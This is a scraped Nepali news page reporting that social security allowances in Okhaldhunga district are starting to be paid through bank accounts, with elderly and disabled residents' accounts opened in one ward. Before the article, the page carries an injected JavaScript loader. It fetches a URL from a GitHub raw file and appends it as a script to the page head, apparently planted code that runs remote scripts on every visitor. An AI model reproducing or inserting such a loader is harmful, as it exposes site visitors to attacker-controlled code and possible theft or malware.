;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ओखलढुंगामा सामाजिक सुरक्षा भत्ता बैंककिङ्ग् प्रणाली मार्फत वितरण गर्न सुरु – जुनेली न्युज
शनिबार, असार २९, २०८२
  • होमपेज
  • ओखलढुंगामा सामाजिक सुरक्षा भत्ता बैंककिङ्ग् प्रणाली मार्फत वितरण गर्न सुरु
समाचार

ओखलढुंगामा सामाजिक सुरक्षा भत्ता बैंककिङ्ग् प्रणाली मार्फत वितरण गर्न सुरु

असोज १०,

ओखलढुंगा । ओखलढुंगामा सामाजिक सुरक्षा भत्ता बैंककिङ्ग प्रणाली मार्फत वितरण गर्न सुरु गरिएको छ ।  नेपाल सरकाले बैंक मार्फत सामाजिक सुरक्षा भत्ता वितरण गर्ने नीति अघि सारे अनुरुप जिल्लाको लिखु गाउँपालिका वडा न १ च्युरीडाँडामा एक कार्यक्रम विच जिल्ला समन्वय समिति सदस्य रामचन्द्र बोगटीले सोही वडाका जेष्ठ नागरिक सोमबहादुर खड्काको खाता खोली कार्यको प्ररम्भ गरेका हुन् ।

जिल्लामै पहिलो पटक राष्ट्रिय वाणिज्य बैंक, साँघुटार शाखाको समन्वयमा वडा अध्यक्ष कुमारराज सुवेदीको सकृयतामा शनिबार वडाले घर घर पुगेर अपाङ्ग, अशक्त, जेष्ठ नागरिकको खाता खोल्ने कार्य सुचारु भएको कार्यक्रम सहभागी स्थानीय विनोद गजुरेलले जानकारी दिए ।

शनिबारदेखि सुरुभएको खाता खोल्ने कार्यमा ५८ जनाको खाता सञ्चालन भएको वडा अध्यक्ष कुमारराज सुवेदीले बताए । उनले वडाका सबै भत्ता बुझदै आएकाहरुको १५ दिन भित्र खाता सञ्चालन गरिसक्ने लक्ष्य लिएको बताए ।

No description available.

फेसबुक प्रतिक्रियाहरु